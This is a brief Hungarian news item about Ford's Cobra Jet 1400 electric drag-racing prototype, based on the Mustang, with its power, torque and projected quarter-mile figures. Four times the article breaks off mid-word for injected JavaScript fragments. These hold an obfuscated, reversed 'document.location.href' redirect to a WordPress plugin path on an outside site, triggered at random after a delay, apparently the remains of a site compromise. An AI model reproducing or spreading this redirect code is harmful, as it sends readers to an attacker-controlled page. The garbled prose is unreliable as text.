Elkészült első gyári e-dragsterével a Ford. A Mustang alapjaira épülő Cobra Jet 1400 protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totípus nevében hordozza legfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb műszaki jellemzőjét: a villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor 1400 lóerős, legnagyobb forgatónyomatéka hozzávetőlegesen 1500 Nm. Ez versenyhelyzetben alig több mint 8 másodperces időt ígér negyed mérföldön; a célvonalon aztán 274 km/órával száguld az autó. Ezek elméleti számok, az autót még nem tesztelték élesben, de a Ford azt ígéri, az autó még az idén megmutatja, mire is képes. A Ford egyébként 1968 óta építi Cobra Jet néven gyári gyorsulási versenyautóit. A hátsó kerék előtt ágaskodó mérgeskígyó kötelező stíluselem, ahogy a motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torháztető domborodó power dome-ja is – utóbbinak természetesen semmi funkciója nincs…
- Hirdetés -